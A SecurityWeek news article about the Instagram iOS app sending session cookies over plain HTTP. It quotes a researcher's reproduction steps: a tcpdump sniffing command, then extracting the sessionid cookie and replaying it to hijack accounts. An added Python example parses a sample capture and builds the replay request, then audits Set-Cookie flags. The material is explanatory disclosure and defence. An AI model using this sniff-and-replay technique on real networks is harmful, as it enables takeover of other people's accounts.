SecurityWeek
Instagram App Exposes Users to Man-in-the-Middle Attacks: Researcher

A security researcher has released details of an issue affecting the Instagram application for iOS devices that exposes users to hackers launching man-in-the-middle attacks.

“In a nutshell some API endpoints are HTTP which means I can most probably take control of your account if we’re on the same wifi,” researcher Stevie Graham tweeted July 27. “Denied bug bounty. Next step is to write automated tool enabling mass hijacking of accounts.”

Facebook, which purchased Instagram in 2012, did not respond to a request for comment before publication. However, Instagram co-founder Mike Krieger responded to the situation on the Hacker News site by stating that Instagram has been steadily increasing its HTTPS coverage.

“For the remainder of the app, especially latency-sensitive read endpoints like the main feed and other browsing experiences, we’re actively working on rolling out HTTPS while making sure we don’t regress on performance, stability, and user experience,” Krieger wrote. “This is a project we’re hoping to complete soon, and we’ll share our experiences in our eng blog so other companies can learn from it as well.”

In his description of the issue, Graham explained that the Instagram app makes API calls to plain-HTTP endpoints with its session cookie in the request headers, so anyone who can read that traffic can replay the cookie and take over the session.

The issue can be recreated by doing the following, he wrote:

  • Jump on an open network or WEP encrypted wifi access point
  • Put your network interface into promiscuous mode filtering on i.instagram.com:

sudo tcpdump -In -i en0 -s 2048 -A dst i.instagram.com

  • Wait for someone to use the Instagram iOS app on the same network
  • Extract cookie request header from the resulting output
  • Use the sessionid cookie parameter to make any API call as that user, even HTTPS endpoints like direct messages.

“I was able to perform a session hijack on my own account on my laptop while someone else browsed Instagram on my iPhone,” he wrote.

Graham wrote that he was also able to take the cookie sniffed from the iOS app, go to instagram.com as a logged-out user, set document.cookie = $COOKIE, and navigate to a profile, where he found himself logged in as that user.

“There is some screwy behaviour where ‘instagram.com/’ gets into redirect loop, I will see if I can fix that,” he wrote. “However going to ‘instagram.com/someones_profile’ works and shows me as logged in. I think this attack is extremely severe because it allows full session hijack and is easily automated. I could go to the Apple Store tomorrow and reap thousands of accounts in one day, and then use them to post spam.”
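To make the capture-and-replay procedure and the cookie reuse described above concrete, here is an added example. It is not Graham's tool and not code from Instagram or Facebook. It parses a tcpdump -A style capture for plaintext requests carrying a sessionid cookie, builds the replay request from the first one it finds, and audits the server's Set-Cookie headers for the attribute whose absence lets the client send the cookie over HTTP at all. The capture text is constructed for the example: the hostname i.instagram.com and the cookie name sessionid come from the article, while the request path, the other cookie names, and every value are invented.

```python
import re
from http.cookies import SimpleCookie

# Constructed sample of what `tcpdump -A` prints for one plaintext request
# and its response. The hostname follows the article; the path, the cookie
# names other than sessionid, and all cookie values are invented.
SAMPLE_CAPTURE = (
    "12:01:13.123456 IP 10.0.0.42.52311 > 203.0.113.10.80: Flags [P.], length 611\n"
    "GET /api/v1/feed/timeline/ HTTP/1.1\r\n"
    "Host: i.instagram.com\r\n"
    "User-Agent: Instagram 6.0.0 (iPhone; iOS 7.1.2)\r\n"
    "Cookie: sessionid=IGSC1a2b3c4d5e6f; ds_user_id=123456789; csrftoken=abcdef0123\r\n"
    "Accept: */*\r\n"
    "\r\n"
    "12:01:13.234567 IP 203.0.113.10.80 > 10.0.0.42.52311: Flags [P.], length 380\n"
    "HTTP/1.1 200 OK\r\n"
    "Set-Cookie: sessionid=IGSC1a2b3c4d5e6f; Path=/; HttpOnly\r\n"
    "Set-Cookie: csrftoken=abcdef0123; Path=/\r\n"
    "Content-Type: application/json\r\n"
    "\r\n"
)

REQUEST_LINE = re.compile(r"^(GET|POST|PUT|PATCH|DELETE|HEAD) (\S+) HTTP/1\.[01]$")
HEADER_LINE = re.compile(r"^([A-Za-z0-9-]+):\s*(.*)$")


def extract_sessions(capture):
    """Walk the plaintext HTTP requests in a tcpdump -A dump and return one
    record per request that carried a sessionid cookie. A request is only
    readable here because it went over port 80; over TLS there is nothing
    to parse."""
    sessions, current = [], None
    for raw in capture.splitlines():
        line = raw.rstrip("\r")
        m = REQUEST_LINE.match(line)
        if m:
            current = {"method": m.group(1), "path": m.group(2),
                       "host": None, "cookies": {}}
            sessions.append(current)
            continue
        if current is None:
            continue                      # response line or tcpdump packet line
        if line == "":
            current = None                # blank line ends the request headers
            continue
        h = HEADER_LINE.match(line)
        if not h:
            continue
        name, value = h.group(1).lower(), h.group(2)
        if name == "host":
            current["host"] = value
        elif name == "cookie":
            jar = SimpleCookie()
            jar.load(value)
            current["cookies"].update({k: v.value for k, v in jar.items()})
    return [s for s in sessions if "sessionid" in s["cookies"]]


def replay_request(session, path=None):
    """Build the raw request an attacker would send with the sniffed cookie:
    the 'make any API call as that user' step. Returned as text rather than
    sent so the example runs offline. The server cannot tell this request
    from the victim's own, because the cookie is the only credential."""
    path = path or session["path"]
    cookie = "; ".join(f"{k}={v}" for k, v in session["cookies"].items())
    return (f"GET {path} HTTP/1.1\r\n"
            f"Host: {session['host']}\r\n"
            f"Cookie: {cookie}\r\n\r\n")


def audit_set_cookie(capture):
    """Check every Set-Cookie in the capture for the attributes that bound
    this bug. Secure stops the client sending the cookie over plain HTTP at
    all; HttpOnly keeps page script from reading it (it does not stop a
    logged-out browser from being handed one via document.cookie, which is
    the trick in the article). Returns {cookie name: [missing attributes]}."""
    findings = {}
    for m in re.finditer(r"^Set-Cookie:\s*(.+?)\r?$", capture, re.M):
        jar = SimpleCookie()
        jar.load(m.group(1))
        for name, morsel in jar.items():
            findings[name] = [attr for attr, flag in (("Secure", "secure"),
                                                     ("HttpOnly", "httponly"))
                              if not morsel[flag]]
    return findings


if __name__ == "__main__":
    for s in extract_sessions(SAMPLE_CAPTURE):
        print(f"{s['host']}{s['path']} leaked sessionid={s['cookies']['sessionid']}")
        print(replay_request(s))
    for name, missing in audit_set_cookie(SAMPLE_CAPTURE).items():
        print(f"Set-Cookie {name}: missing {', '.join(missing) or 'nothing'}")
```

The audit is the check a defender would run against their own service: a session cookie issued without the Secure attribute will be attached to any plain-HTTP request the client makes to that host, which is exactly the condition Graham exploited. Setting Secure alone is not a complete fix, though, because an app that still talks to HTTP endpoints that require the cookie would simply break; the cookie flag has to land together with the HTTPS rollout Krieger describes.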

Written By

Marketing professional with a background in journalism and a focus on IT security.
